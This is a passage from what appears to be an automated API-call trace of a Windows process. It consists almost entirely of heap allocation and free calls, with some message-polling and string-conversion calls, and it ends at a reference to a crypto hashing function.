hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0152.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0152.433] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0152.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0152.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0152.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0152.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e28 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0152.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54df8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.436] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0152.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0152.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0152.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0152.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0152.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0152.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0152.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0152.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e28 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.440] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0152.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0152.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0152.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0152.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", 